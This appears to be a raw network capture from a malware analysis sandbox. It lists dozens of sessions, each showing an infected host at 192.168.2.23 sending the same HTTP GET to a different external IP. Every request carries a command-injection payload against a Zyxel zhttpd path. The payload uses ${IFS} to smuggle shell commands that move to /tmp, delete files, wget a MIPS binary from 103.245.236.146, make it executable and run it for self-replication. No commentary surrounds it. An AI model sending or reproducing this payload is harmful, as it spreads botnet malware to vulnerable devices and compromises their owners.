                                                Jan 28, 2024 10:16:34.954943895 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6828192.168.2.233492692.23.167.13443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:34.954962015 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6829192.168.2.235646859.98.163.140443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:34.954989910 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6830192.168.2.234655888.4.26.191443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:34.955007076 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6831192.168.2.235541024.47.91.105443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:34.955040932 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6832192.168.2.23376789.5.245.102443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:34.955081940 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6833192.168.2.234049614.48.104.186443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:34.955127001 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6834192.168.2.2344412170.179.172.115443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:34.955157995 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6835192.168.2.236051678.174.28.235443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:34.955157995 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6836192.168.2.2333034107.112.35.246443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:34.955173016 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6837192.168.2.2338056169.83.99.231443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:34.955192089 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6838192.168.2.234030485.115.90.241443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:34.955249071 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6839192.168.2.233750036.74.218.187443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:34.955285072 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6840192.168.2.235636067.12.164.212443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:34.955312014 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6841192.168.2.2341062159.193.6.116443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:34.955331087 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6842192.168.2.2354178201.74.65.146443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:34.955373049 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6843192.168.2.235272878.98.92.185443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:34.955393076 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6844192.168.2.2336886130.165.215.155443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:34.955406904 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6845192.168.2.233966652.160.217.11443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:34.955465078 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6846192.168.2.233877482.219.66.249443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:34.955481052 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6847192.168.2.2335990156.86.220.31443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:34.955498934 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6848192.168.2.234650448.153.168.193443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:34.955533981 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6849192.168.2.2354710185.143.64.139443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:34.955543041 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6850192.168.2.235251670.242.76.244443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:34.955600023 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6851192.168.2.235843435.140.106.78443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:34.955616951 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6852192.168.2.2335784203.24.210.171443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:34.955640078 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6853192.168.2.234194258.164.219.28443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:34.955673933 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6854192.168.2.2348278173.22.83.26443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:34.955682039 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6855192.168.2.234698018.113.178.162443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:34.955708981 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6856192.168.2.2356440223.127.98.35443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:34.955729961 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6857192.168.2.2337726172.234.64.145443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:34.955770969 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6858192.168.2.2347500175.93.249.196443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:34.955794096 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6859192.168.2.235240669.209.243.122443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:34.955821037 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6860192.168.2.2338968159.47.7.244443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:34.955830097 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6861192.168.2.233331893.10.126.188443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:34.955861092 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6862192.168.2.2339778212.189.87.15443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:34.955893040 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6863192.168.2.236082658.147.190.206443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:34.955929041 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6864192.168.2.234743084.168.54.64443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:34.955975056 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6865192.168.2.23577068.188.210.1443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:34.955985069 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6866192.168.2.2333450134.159.198.118443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:34.956022024 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6867192.168.2.2347850144.29.235.204443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:34.956034899 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6868192.168.2.2340404223.244.55.37443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:34.956056118 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6869192.168.2.234955445.235.145.250443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:34.956104994 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6870192.168.2.2356312163.33.54.180443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:34.956134081 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6871192.168.2.233300683.60.49.100443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:34.956171036 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6872192.168.2.2360854159.229.107.154443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:34.956171036 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6873192.168.2.2350998134.189.207.12443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:34.956216097 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6874192.168.2.2339046159.95.73.161443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:34.956228971 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6875192.168.2.2348520144.254.24.118443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:34.956278086 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6876192.168.2.2358882203.108.88.190443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:34.956317902 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6877192.168.2.235089665.50.5.225443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:34.956341028 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6878192.168.2.233796489.20.60.100443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:34.956387997 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6879192.168.2.234873441.239.114.163443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:34.956388950 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6880192.168.2.235174057.86.5.16443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:34.956422091 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6881192.168.2.234886438.2.165.233443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:34.956459999 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6882192.168.2.2349120115.123.86.8443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:34.956468105 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6883192.168.2.2357948155.248.223.116443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:34.956516981 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6884192.168.2.2349300173.4.111.111443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:34.956681967 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6885192.168.2.2359760186.135.228.75443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:34.956711054 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6886192.168.2.235271676.127.149.250443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:34.956729889 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6887192.168.2.2335776115.216.208.81443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:34.956756115 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6888192.168.2.234820085.70.227.22443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:34.956779957 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6889192.168.2.2353320129.62.42.232443
                                                TimestampBytes transferredDirectionData
